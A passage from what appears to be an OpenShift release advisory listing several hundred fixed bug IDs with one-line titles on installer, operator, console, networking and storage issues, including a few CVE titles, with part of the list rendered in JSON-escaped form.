2043533 - Update ironic, inspector, and ironic-python-agent to latest bugfix release
2043672 - [MAPO] root volumes not working
2044140 - When 'oc adm upgrade --to-image ...' rejects an update as not recommended, it should mention --allow-explicit-upgrade
2044207 - [KMS] The data in the text box does not get cleared on switching the authentication method
2044227 - Test Managed cluster should only include cluster daemonsets that have maxUnavailable update of 10 or 33 percent fails
2044412 - Topology list misses separator lines and hover effect let the list jump 1px
2044421 - Topology list does not allow selecting an application group anymore
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor
2044803 - Unify button text style on VM tabs
2044824 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]
2045065 - Scheduled pod has nodeName changed
2045073 - Bump golang and build images for local-storage-operator
2045087 - Failed to apply sriov policy on intel nics
2045551 - Remove enabled FeatureGates from TechPreviewNoUpgrade
2045559 - API_VIP moved when kube-api container on another master node was stopped
2045577 - [ocp 4.9 | ovn-kubernetes] ovsdb_idl|WARN|transaction error: {"details":"cannot delete Datapath_Binding row 29e48972-xxxx because of 2 remaining reference(s)","error":"referential integrity violation
2045872 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt
2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter
2046133 - [MAPO]IPI proxy installation failed
2046156 - Network policy: preview of affected pods for non-admin shows empty popup
2046157 - Still uses pod-security.admission.config.k8s.io/v1alpha1 in admission plugin config
2046191 - Operator pod is missing correct qosClass and priorityClass
2046277 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the module.vpc.aws_subnet.private_subnet[0] resource
2046319 - oc debug cronjob command failed with error "unable to extract pod template from type *v1.CronJob".
2046435 - Better Devfile Import Strategy support in the 'Import from Git' flow
2046496 - Awkward wrapping of project toolbar on mobile
2046497 - Re-enable TestMetricsEndpoint test case in console operator e2e tests
2046498 - "All Projects" and "all applications" use different casing on topology page
2046591 - Auto-update boot source is not available while create new template from it
2046594 - "Requested template could not be found" while creating VM from user-created template
2046598 - Auto-update boot source size unit is byte on customize wizard
2046601 - Cannot create VM from template
2046618 - Start last run action should contain current user name in the started-by annotation of the PLR
2046662 - Should upgrade the go version to be 1.17 for example go operator memcached-operator
2047197 - Should upgrade the operator_sdk.util version to "0.4.0" for the "osdk_metric" module
2047257 - [CP MIGRATION] Node drain failure during control plane node migration
2047277 - Storage status is missing from status card of virtualization overview
2047308 - Remove metrics and events for master port offsets
2047310 - Running VMs per template card needs empty state when no VMs exist
2047320 - New route annotation to show another URL or hide topology URL decorator doesn't work for Knative Services
2047335 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2047362 - Removing prometheus UI access breaks origin test
2047445 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure
2047670 - Installer should pre-check that the hosted zone is not associated with the VPC and throw the error message.
2047702 - Issue described on bug #2013528 reproduced: mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8
2047710 - [OVN] ovn-dbchecker CrashLoopBackOff and sbdb jsonrpc unix socket receive error
2047732 - [IBM]Volume is not deleted after destroy cluster
2047741 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the module.masters.aws_network_interface.master[1] resource
2047790 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2047799 - release-openshift-ocp-installer-e2e-aws-upi-4.9
2047870 - Prevent redundant queries of BIOS settings in HostFirmwareController
2047895 - Fix architecture naming in oc adm release mirror for aarch64
2047911 - e2e: Mock CSI tests fail on IBM ROKS clusters
2047913 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2047925 - [FJ OCP4.10 Bug]: IRONIC_KERNEL_PARAMS does not contain coreos_kernel_params during iPXE boot
2047935 - [4.11] Bootimage bump tracker
2047998 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-*
2048059 - Service Level Agreement (SLA) always show 'Unknown'
2048067 - [IPI on Alibabacloud] "Platform Provisioning Check" tells '"ap-southeast-6": enhanced NAT gateway is not supported', which seems false
2048186 - Image registry operator panics when finalizes config deletion
2048214 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud
2048219 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool
2048221 - Capitalization of titles in the VM details page is inconsistent.
2048222 - [AWS GovCloud] Cluster can not be installed on AWS GovCloud regions via terminal interactive UI.
2048276 - Cypress E2E tests fail due to a typo in test-cypress.sh
2048333 - prometheus-adapter becomes inaccessible during rollout
2048352 - [OVN] node does not recover after NetworkManager restart, NotReady and unreachable
2048442 - [KMS] UI does not have option to specify kube auth path and namespace for cluster wide encryption
2048451 - Custom serviceEndpoints in install-config are reported to be unreachable when environment uses a proxy
2048538 - Network policies are not implemented or updated by OVN-Kubernetes
2048541 - incorrect rbac check for install operator quick starts
2048563 - Leader election conventions for cluster topology
2048575 - IP reconciler cron job failing on single node
2048686 - Check MAC address provided on the install-config.yaml file
2048687 - All bare metal jobs are failing now due to End of Life of centos 8
2048793 - Many Conformance tests are failing in OCP 4.10 with Kuryr
2048803 - CRI-O seccomp profile out of date
2048824 - [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class
2048841 - [ovn] Missing lr-policy-list and snat rules for egressip when new pods are added
2048955 - Alibaba Disk CSI Driver does not have CI
2049073 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured
2049078 - Bond CNI: Failed to attach Bond NAD to pod
2049108 - openshift-installer intermittent failure on AWS with 'Error: Error waiting for NAT Gateway (nat-xxxxx) to become available'
2049117 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently
2049133 - oc adm catalog mirror throws 'missing signature key' error when using file://local/index
2049142 - Missing "app" label
2049169 - oVirt CSI driver should use the trusted CA bundle when cluster proxy is configured
2049234 - ImagePull fails with error "unable to pull manifest from example.com/busy.box:v5 invalid reference format"
2049410 - external-dns-operator creates provider section, even when not requested
2049483 - Sidepanel for Connectors/workloads in topology shows invalid tabs
2049613 - MTU migration on SDN IPv4 causes API alerts
2049671 - system:serviceaccount:openshift-cluster-csi-drivers:aws-ebs-csi-driver-operator trying to GET and DELETE /api/v1/namespaces/openshift-cluster-csi-drivers/configmaps/kube-cloud-config which does not exist
2049687 - superfluous apirequestcount entries in audit log
2049775 - cloud-provider-config change not applied when ExternalCloudProvider enabled
2049787 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs
2049832 - ContainerCreateError when trying to launch large (>500) numbers of pods across nodes
2049872 - cluster storage operator AWS credentialsrequest lacks KMS privileges
2049889 - oc new-app --search nodejs warns about access to sample content on quay.io
2050005 - Plugin module IDs can clash with console module IDs causing runtime errors
2050011 - Observe > Metrics page: Timespan text input and dropdown do not align
2050120 - Missing metrics in kube-state-metrics
2050146 - Installation on PSI fails with: 'openstack platform does not have the required standard-attr-tag network extension'
2050173 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0
2050180 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2
2050300 - panic in cluster-storage-operator while updating status
2050332 - Malformed ClusterClaim lifetimes cause the clusterclaims-controller to silently fail to reconcile all clusterclaims
2050335 - azure-disk failed to mount with error special device does not exist
2050345 - alert data for burn budget needs to be updated to prevent regression
2050407 - revert "force cert rotation every couple days for development" in 4.11
2050409 - ip-reconcile job is failing consistently
2050452 - Update osType and hardware version used by RHCOS OVA to indicate it is a RHEL 8 guest
2050466 - machine config update with invalid container runtime config should be more robust
2050637 - Blog Link not re-directing to the intended website in the last modal in the Dev Console Onboarding Tour
2050698 - After upgrading the cluster the console still show 0 of N, 0% progress for worker nodes
2050707 - up test for prometheus pod looks too far in the past
2050767 - Vsphere upi tries to access vsphere during manifests generation phase
2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function
2050882 - Crio appears to be coredumping in some scenarios
2050902 - not all resources created during import have common labels
2050946 - Cluster-version operator fails to notice TechPreviewNoUpgrade featureSet change after initialization-lookup error
2051320 - Need to build ose-aws-efs-csi-driver-operator-bundle-container image for 4.11
2051333 - [aws] records in public hosted zone and BYO private hosted zone were not deleted.
2051377 - Unable to switch vfio-pci to netdevice in policy
2051378 - Template wizard is crashed when there are no templates existing
2051423 - migrate loadbalancers from amphora to ovn not working
2051457 - [RFE] PDB for cloud-controller-manager to avoid going too many replicas down
2051470 - prometheus: Add validations for relabel configs
2051558 - RoleBinding in project without subject is causing "Project access" page to fail
2051578 - Sort is broken for the Status and Version columns on the Cluster Settings > ClusterOperators page
2051583 - sriov must-gather image doesn't work
2051593 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line
2051611 - Remove Check which enforces summary_interval must match logSyncInterval
2051642 - Remove "Tech-Preview" Label for the Web Terminal GA release
2051657 - Remove 'Tech preview' from minimal deployment Storage System creation
2051718 - MetalLB: Validation Webhook: BGPPeer hold time is allowed to be set to less than 3s
2051722 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop
2051881 - [vSphere CSI driver Operator] RWX volumes counts metrics `vsphere_rwx_volumes_total` not valid
2051954 - Allow changing of policyAuditConfig ratelimit post-deployment
2051969 - Need to build local-storage-operator-metadata-container image for 4.11
2051985 - An APIRequestCount without dots in the name can cause a panic
2052016 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set.
2052034 - Can't start correct debug pod using pod definition yaml in OCP 4.8
2052055 - Whereabouts should implement client-go 1.22+
2052056 - Static pod installer should throttle creating new revisions
2052071 - local storage operator metrics target down after upgrade
2052095 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1
2052270 - FSyncControllerDegraded has "treshold" -> "threshold" typos
2052309 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests
2052332 - Probe failures and pod restarts during 4.7 to 4.8 upgrade
2052393 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh
2052398 - 4.9 to 4.10 upgrade fails for ovnkube-masters
2052415 - Pod density test causing problems when using kube-burner
2052513 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade.
2052578 - Create new app from a private git repository using 'oc new app' with basic auth does not work.
2052595 - Remove dev preview badge from IBM FlashSystem deployment windows
2052618 - Node reboot causes duplicate persistent volumes
2052671 - Add Sprint 214 translations
2052674 - Remove extra spaces
2052700 - kube-controller-manager should use configmap lease
2052701 - kube-scheduler should use configmap lease
2052814 - go fmt fails in OSM after migration to go 1.17
2052840 - IMAGE_BUILDER=docker make test-e2e-operator-ocp runs with podman instead of docker
2052953 - Observe dashboard always opens for last viewed workload instead of the selected one
2052956 - Installing virtualization operator duplicates the first action on workloads in topology
2052975 - High cpu load on Juniper Qfx5120 Network switches after upgrade to Openshift 4.8.26
2052986 - Console crashes when Mid cycle hook in Recreate strategy(edit deployment/deploymentConfig) selects Lifecycle strategy as "Tags the current image as an image stream tag if the deployment succeeds"
2053006 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11
2053104 - [vSphere CSI driver Operator] hw_version_total metric update wrong value after upgrade nodes hardware version from `vmx-13` to `vmx-15`
2053112 - nncp status is unknown when nnce is Progressing
2053118 - nncp Available condition reason should be exposed in `oc get`
2053168 - Ensure the core dynamic plugin SDK package has correct types and code
2053205 - ci-openshift-cluster-network-operator-master-e2e-agnostic-upgrade is failing most of the time
2053304 - Debug terminal no longer works in admin console
2053312 - requestheader IDP test doesn't wait for cleanup, causing high failure rates
2053334 - rhel worker scaleup playbook failed because missing some dependency of podman
2053343 - Cluster Autoscaler not scaling down nodes which seem to qualify for scale-down
2053491 - nmstate interprets interface names as float64 and subsequently crashes on state update
2053501 - Git import detection does not happen for private repositories
2053582 - inability to detect static lifecycle failure
2053596 - [IBM Cloud] Storage IOPS limitations and lack of IPI ETCD deployment options trigger leader election during cluster initialization
2053609 - LoadBalancer SCTP service leaves stale conntrack entry that causes issues if service is recreated
2053622 - PDB warning alert when CR replica count is set to zero
2053685 - Topology performance: Immutable .toJSON consumes a lot of CPU time when rendering a large topology graph (~100 nodes)
2053721 - When using RootDeviceHint rotational setting the host can fail to provision
2053922 - [OCP 4.8][OVN] pod interface: error while waiting on OVS.Interface.external-ids
2054095 - [release-4.11] Gather images.config.openshift.io cluster resource definition
2054197 - The ProjectHelmChartRepository schema has merged but has not been initialized in the cluster yet
2054200 - Custom created services in openshift-ingress removed even though the services are not of type LoadBalancer
2054238 - console-master-e2e-gcp-console is broken
2054254 - vSphere test failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
2054285 - Services other than knative service also shows as KSVC in add subscription/trigger modal
2054319 - must-gather | gather_metallb_logs can't detect metallb pod
2054351 - Restart of ptp4l/phc2sys on change of PTPConfig generates more than one times, socket error in event frame work
2054385 - redhat-operator index image build failed with AMQ brew build - amq-interconnect-operator-metadata-container-1.10.13
2054564 - DPU network operator 4.10 branch need to sync with master
2054630 - cancel create silence from kebab menu of alerts page will navigated to the previous page
2054693 - Error deploying HorizontalPodAutoscaler with oc new-app command in OpenShift 4
2054701 - [MAPO] Events are not created for MAPO machines
2054705 - [tracker] nf_reinject calls nf_queue_entry_free on an already freed entry->state
2054735 - Bad link in CNV console
2054770 - IPI baremetal deployment metal3 pod crashes when using capital letters in hosts bootMACAddress
2054787 - SRO controller goes to CrashLoopBackOff status when the pull-secret does not have the correct permissions
2054950 - A large number is showing on disk size field
2055305 - Thanos Querier high CPU and memory usage till OOM
2055386 - MetalLB changes the shared external IP of a service upon updating the externalTrafficPolicy definition
2055433 - Unable to create br-ex as gateway is not found
2055470 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation
2055492 - The default YAML on vm wizard is not latest
2055601 - installer did not destroy *.app dns record in a IPI on ASH install
2055702 - Enable Serverless tests in CI
2055723 - CCM operator doesn't deploy resources after enabling TechPreviewNoUpgrade feature set.
2055729 - NodePerfCheck fires and stays active on momentary high latency
2055814 - Custom dynamic extension point causes runtime and compile time error
2055861 - cronjob collect-profiles failed leads node reach to OutOfpods status
2055980 - [dynamic SDK][internal] console plugin SDK does not support table actions
2056454 - Implement preallocated disks for oVirt in the cluster API provider
2056460 - Implement preallocated disks for oVirt in the OCP installer
2056496 - If image does not exists for builder image then upload jar form crashes
2056519 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies
2056607 - Running kubernetes-nmstate handler e2e tests stuck on OVN clusters
2056752 - Better to named the oc-mirror version info with more information like the `oc version --client`
2056802 - "enforcedLabelLimit|enforcedLabelNameLengthLimit|enforcedLabelValueLengthLimit" do not take effect
2056841 - [UI] [DR] Web console update is available pop-up is seen multiple times on Hub cluster where ODF operator is not installed and unnecessarily it pop-up on the Managed cluster as well where ODF operator is installed
2056893 - incorrect warning for --to-image in oc adm upgrade help
2056967 - MetalLB: speaker metrics is not updated when deleting a service
2057025 - Resource requests for the init-config-reloader container of prometheus-k8s-* pods are too high
2057054 - SDK: k8s methods resolves into Response instead of the Resource
2057079 - [cluster-csi-snapshot-controller-operator] CI failure: events should not repeat pathologically
2057101 - oc commands working with images print an incorrect and inappropriate warning
2057160 - configure-ovs selects wrong interface on reboot
2057183 - OperatorHub: Missing "valid subscriptions" filter
2057251 - response code for Pod count graph changed from 422 to 200 periodically for about 30 minutes if pod is rescheduled
2057358 - [Secondary Scheduler] - cannot build bundle index image using the secondary scheduler operator bundle
2057387 - [Secondary Scheduler] - olm.skiprange, com.redhat.openshift.versions is incorrect and no minkubeversion
2057403 - CMO logs show forbidden: User "system:serviceaccount:openshift-monitoring:cluster-monitoring-operator" cannot get resource "replicasets" in API group "apps" in the namespace "openshift-monitoring"
2057495 - Alibaba Disk CSI driver does not provision small PVCs
2057558 - Marketplace operator polls too frequently for cluster operator status changes
2057633 - oc rsync reports misleading error when container is not found
2057642 - ClusterOperator status.conditions[].reason "etcd disk metrics exceeded..." should be a CamelCase slug
2057644 - FSyncControllerDegraded latches True, even after fsync latency recovers on all members
2057696 - Removing console still blocks OCP install from completing
2057762 - ingress operator should report Upgradeable False to remind user before upgrade to 4.10 when Non-SAN certs are used
2057832 - expr for record rule: "cluster:telemetry_selected_series:count" is improper
2057967 - KubeJobCompletion does not account for possible job states
2057990 - Add extra debug information to image signature workflow test
2057994 - SRIOV-CNI failed to load netconf: LoadConf(): failed to get VF information
2058030 - On OCP 4.10+ using OVNK8s on BM IPI, nodes register as localhost.localdomain
2058217 - [vsphere-problem-detector-operator] 'vsphere_rwx_volumes_total' metric name make confused
2058225 - openshift_csi_share_* metrics are not found from telemeter server
2058282 - Websockets stop updating during cluster upgrades
2058291 - CI builds should have correct version of Kube without needing to push tags every time
2058368 - Openshift OVN-K got restarted multiple times with the error "ovsdb-server/memory-trim-on-compaction on'' failed: exit status 1 and "ovndbchecker.go:118] unable to turn on memory trimming for SB DB, stderr "
, cluster unavailable\n2058370 - e2e-aws-driver-toolkit CI job is failing\n2058421 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install\n2058424 - ConsolePlugin proxy always passes Authorization header even if `authorize` property is omitted or false\n2058623 - Bootstrap server dropdown menu in Create Event Source- KafkaSource form is empty even if it\u0027s created\n2058626 - Multiple Azure upstream kube fsgroupchangepolicy tests are permafailing expecting gid \"1000\" but geting \"root\"\n2058671 - whereabouts IPAM CNI ip-reconciler cronjob specification requires hostnetwork, api-int lb usage \u0026 proper backoff\n2058692 - [Secondary Scheduler] Creating secondaryscheduler instance fails with error \"key failed with : secondaryschedulers.operator.openshift.io \"secondary-scheduler\" not found\"\n2059187 - [Secondary Scheduler] - key failed with : serviceaccounts \"secondary-scheduler\" is forbidden\n2059212 - [tracker] Backport https://github.com/util-linux/util-linux/commit/eab90ef8d4f66394285e0cff1dfc0a27242c05aa\n2059213 - ART cannot build installer images due to missing terraform binaries for some architectures\n2059338 - A fully upgraded 4.10 cluster defaults to HW-13 hardware version even if HW-15 is default (and supported)\n2059490 - The operator image in CSV file of the ART DPU network operator bundle is incorrect\n2059567 - vMedia based IPI installation of OpenShift fails on Nokia servers due to issues with virtual media attachment and boot source override\n2059586 - (release-4.11) Insights operator doesn\u0027t reconcile clusteroperator status condition messages\n2059654 - Dynamic demo plugin proxy example out of date\n2059674 - Demo plugin fails to build\n2059716 - cloud-controller-manager flaps operator version during 4.9 -\u003e 4.10 update\n2059791 - [vSphere CSI driver Operator] didn\u0027t update \u0027vsphere_csi_driver_error\u0027 metric value when fixed the error manually\n2059840 - [LSO]Could not 
gather logs for pod diskmaker-discovery and diskmaker-manager\n2059943 - MetalLB: Move CI config files to metallb repo from dev-scripts repo\n2060037 - Configure logging level of FRR containers\n2060083 - CMO doesn\u0027t react to changes in clusteroperator console\n2060091 - CMO produces invalid alertmanager statefulset if console cluster .status.consoleURL is unset\n2060133 - [OVN RHEL upgrade] could not find IP addresses: failed to lookup link br-ex: Link not found\n2060147 - RHEL8 Workers Need to Ensure libseccomp is up to date at install time\n2060159 - LGW: External-\u003eService of type ETP=Cluster doesn\u0027t go to the node\n2060329 - Detect unsupported amount of workloads before rendering a lazy or crashing topology\n2060334 - Azure VNET lookup fails when the NIC subnet is in a different resource group\n2060361 - Unable to enumerate NICs due to missing the \u0027primary\u0027 field due to security restrictions\n2060406 - Test \u0027operators should not create watch channels very often\u0027 fails\n2060492 - Update PtpConfigSlave source-crs to use network_transport L2 instead of UDPv4\n2060509 - Incorrect installation of ibmcloud vpc csi driver in IBM Cloud ROKS 4.10\n2060532 - LSO e2e tests are run against default image and namespace\n2060534 - openshift-apiserver pod in crashloop due to unable to reach kubernetes svc ip\n2060549 - ErrorAddingLogicalPort: duplicate IP found in ECMP Pod route cache!\n2060553 - service domain can\u0027t be resolved when networkpolicy is used in OCP 4.10-rc\n2060583 - Remove Console internal-kubevirt plugin SDK package\n2060605 - Broken access to public images: Unable to connect to the server: no basic auth credentials\n2060617 - IBMCloud destroy DNS regex not strict enough\n2060687 - Azure Ci: SubscriptionDoesNotSupportZone - does not support availability zones at location \u0027westus\u0027\n2060697 - [AWS] partitionNumber cannot work for specifying Partition number\n2060714 - [DOCS] Change source_labels to sourceLabels in 
\"Configuring remote write storage\" section\n2060837 - [oc-mirror] Catalog merging error when two or more bundles does not have a set Replace field\n2060894 - Preceding/Trailing Whitespaces In Form Elements on the add page\n2060924 - Console white-screens while using debug terminal\n2060968 - Installation failing due to ironic-agent.service not starting properly\n2060970 - Bump recommended FCOS to 35.20220213.3.0\n2061002 - Conntrack entry is not removed for LoadBalancer IP\n2061301 - Traffic Splitting Dialog is Confusing With Only One Revision\n2061303 - Cachito request failure with vendor directory is out of sync with go.mod/go.sum\n2061304 - workload info gatherer - don\u0027t serialize empty images map\n2061333 - White screen for Pipeline builder page\n2061447 - [GSS] local pv\u0027s are in terminating state\n2061496 - etcd RecentBackup=Unknown ControllerStarted contains no message string\n2061527 - [IBMCloud] infrastructure asset missing CloudProviderType\n2061544 - AzureStack is hard-coded to use Standard_LRS for the disk type\n2061549 - AzureStack install with internal publishing does not create api DNS record\n2061611 - [upstream] The marker of KubeBuilder doesn\u0027t work if it is close to the code\n2061732 - Cinder CSI crashes when API is not available\n2061755 - Missing breadcrumb on the resource creation page\n2061833 - A single worker can be assigned to multiple baremetal hosts\n2061891 - [IPI on IBMCLOUD] missing ?br-sao? 
region in openshift installer\n2061916 - mixed ingress and egress policies can result in half-isolated pods\n2061918 - Topology Sidepanel style is broken\n2061919 - Egress Ip entry stays on node\u0027s primary NIC post deletion from hostsubnet\n2062007 - MCC bootstrap command lacks template flag\n2062126 - IPfailover pod is crashing during creation showing keepalived_script doesn\u0027t exist\n2062151 - Add RBAC for \u0027infrastructures\u0027 to operator bundle\n2062355 - kubernetes-nmstate resources and logs not included in must-gathers\n2062459 - Ingress pods scheduled on the same node\n2062524 - [Kamelet Sink] Topology crashes on click of Event sink node if the resource is created source to Uri over ref\n2062558 - Egress IP with openshift sdn in not functional on worker node. \n2062568 - CVO does not trigger new upgrade again after fail to update to unavailable payload\n2062645 - configure-ovs: don\u0027t restart networking if not necessary\n2062713 - Special Resource Operator(SRO) - No sro_used_nodes metric\n2062849 - hw event proxy is not binding on ipv6 local address\n2062920 - Project selector is too tall with only a few projects\n2062998 - AWS GovCloud regions are recognized as the unknown regions\n2063047 - Configuring a full-path query log file in CMO breaks Prometheus with the latest version of the operator\n2063115 - ose-aws-efs-csi-driver has invalid dependency in go.mod\n2063164 - metal-ipi-ovn-ipv6 Job Permafailing and Blocking OpenShift 4.11 Payloads: insights operator is not available\n2063183 - DefragDialTimeout is set to low for large scale OpenShift Container Platform - Cluster\n2063194 - cluster-autoscaler-default will fail when automated etcd defrag is running on large scale OpenShift Container Platform 4 - Cluster\n2063321 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs\n2063324 - MCO template output directories created with wrong mode causing render failure in unprivileged 
container environments\n2063375 - ptp operator upgrade from 4.9 to 4.10 stuck at pending due to service account requirements not met\n2063414 - on OKD 4.10, when image-registry is enabled, the /etc/hosts entry is missing on some nodes\n2063699 - Builds - Builds - Logs: i18n misses. \n2063708 - Builds - Builds - Logs: translation correction needed. \n2063720 - Metallb EBGP neighbor stuck in active until adding ebgp-multihop (directly connected neighbors)\n2063732 - Workloads - StatefulSets : I18n misses\n2063747 - When building a bundle, the push command fails because is passes a redundant \"IMG=\" on the the CLI\n2063753 - User Preferences - Language - Language selection : Page refresh rquired to change the UI into selected Language. \n2063756 - User Preferences - Applications - Insecure traffic : i18n misses\n2063795 - Remove go-ovirt-client go.mod replace directive\n2063829 - During an IPI install with the 4.10.4 installer on vSphere, getting \"Check\": platform.vsphere.network: Invalid value: \"VLAN_3912\": unable to find network provided\"\n2063831 - etcd quorum pods landing on same node\n2063897 - Community tasks not shown in pipeline builder page\n2063905 - PrometheusOperatorWatchErrors alert may fire shortly in case of transient errors from the API server\n2063938 - sing the hard coded rest-mapper in library-go\n2063955 - cannot download operator catalogs due to missing images\n2063957 - User Management - Users : While Impersonating user, UI is not switching into user\u0027s set language\n2064024 - SNO OCP upgrade with DU workload stuck at waiting for kube-apiserver static pod\n2064170 - [Azure] Missing punctuation in the installconfig.controlPlane.platform.azure.osDisk explain\n2064239 - Virtualization Overview page turns into blank page\n2064256 - The Knative traffic distribution doesn\u0027t update percentage in sidebar\n2064553 - UI should prefer to use the virtio-win configmap than v2v-vmware configmap for windows creation\n2064596 - Fix the hubUrl docs 
link in pipeline quicksearch modal\n2064607 - Pipeline builder makes too many (100+) API calls upfront\n2064613 - [OCPonRHV]- after few days that cluster is alive we got error in storage operator\n2064693 - [IPI][OSP] Openshift-install fails to find the shiftstack cloud defined in clouds.yaml in the current directory\n2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server\n2064705 - the alertmanagerconfig validation catches the wrong value for invalid field\n2064744 - Errors trying to use the Debug Container feature\n2064984 - Update error message for label limits\n2065076 - Access monitoring Routes based on monitoring-shared-config creates wrong URL\n2065160 - Possible leak of load balancer targets on AWS Machine API Provider\n2065224 - Configuration for cloudFront in image-registry operator configuration is ignored \u0026 duration is corrupted\n2065290 - CVE-2021-23648 sanitize-url: XSS\n2065338 - VolumeSnapshot creation date sorting is broken\n2065507 - `oc adm upgrade` should return ReleaseAccepted condition to show upgrade status. 
\n2065510 - [AWS] failed to create cluster on ap-southeast-3\n2065513 - Dev Perspective -\u003e Project Dashboard shows Resource Quotas which are a bit misleading, and too many decimal places\n2065547 - (release-4.11) Gather kube-controller-manager pod logs with garbage collector errors\n2065552 - [AWS] Failed to install cluster on AWS ap-southeast-3 region due to image-registry panic error\n2065577 - user with user-workload-monitoring-config-edit role can not create user-workload-monitoring-config configmap\n2065597 - Cinder CSI is not configurable\n2065682 - Remote write relabel config adds label __tmp_openshift_cluster_id__ to all metrics\n2065689 - Internal Image registry with GCS backend does not redirect client\n2065749 - Kubelet slowly leaking memory and pods eventually unable to start\n2065785 - ip-reconciler job does not complete, halts node drain\n2065804 - Console backend check for Web Terminal Operator incorrectly returns HTTP 204\n2065806 - stop considering Mint mode as supported on Azure\n2065840 - the cronjob object is created with a wrong api version batch/v1beta1 when created via the openshift console\n2065893 - [4.11] Bootimage bump tracker\n2066009 - CVE-2021-44906 minimist: prototype pollution\n2066232 - e2e-aws-workers-rhel8 is failing on ansible check\n2066418 - [4.11] Update channels information link is taking to a 404 error page\n2066444 - The \"ingress\" clusteroperator\u0027s relatedObjects field has kind names instead of resource names\n2066457 - Prometheus CI failure: 503 Service Unavailable\n2066463 - [IBMCloud] failed to list DNS zones: Exactly one of ApiKey or RefreshToken must be specified\n2066605 - coredns template block matches cluster API to loose\n2066615 - Downstream OSDK still use upstream image for Hybird type operator\n2066619 - The GitCommit of the `oc-mirror version` is not correct\n2066665 - [ibm-vpc-block] Unable to change default storage class\n2066700 - [node-tuning-operator] - Minimize wildcard/privilege Usage in 
Cluster and Local Roles\n2066754 - Cypress reports for core tests are not captured\n2066782 - Attached disk keeps in loading status when add disk to a power off VM by non-privileged user\n2066865 - Flaky test: In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (delayed binding)] topology should provision a volume and schedule a pod with AllowedTopologies\n2066886 - openshift-apiserver pods never going NotReady\n2066887 - Dependabot alert: Path traversal in github.com/valyala/fasthttp\n2066889 - Dependabot alert: Path traversal in github.com/valyala/fasthttp\n2066923 - No rule to make target \u0027docker-push\u0027 when building the SRO bundle\n2066945 - SRO appends \"arm64\" instead of \"aarch64\" to the kernel name and it doesn\u0027t match the DTK\n2067004 - CMO contains grafana image though grafana is removed\n2067005 - Prometheus rule contains grafana though grafana is removed\n2067062 - should update prometheus-operator resources version\n2067064 - RoleBinding in Developer Console is dropping all subjects when editing\n2067155 - Incorrect operator display name shown in pipelines quickstart in devconsole\n2067180 - Missing i18n translations\n2067298 - Console 4.10 operand form refresh\n2067312 - PPT event source is lost when received by the consumer\n2067384 - OCP 4.10 should be firing APIRemovedInNextEUSReleaseInUse for APIs removed in 1.25\n2067456 - OCP 4.11 should be firing APIRemovedInNextEUSReleaseInUse and APIRemovedInNextReleaseInUse for APIs removed in 1.25\n2067995 - Internal registries with a big number of images delay pod creation due to recursive SELinux file context relabeling\n2068115 - resource tab extension fails to show up\n2068148 - [4.11] /etc/redhat-release symlink is broken\n2068180 - OCP UPI on AWS with STS enabled is breaking the Ingress operator\n2068181 - Event source powered with kamelet type source doesn\u0027t show associated deployment in resources tab\n2068490 - OLM descriptors integration test failing\n2068538 - 
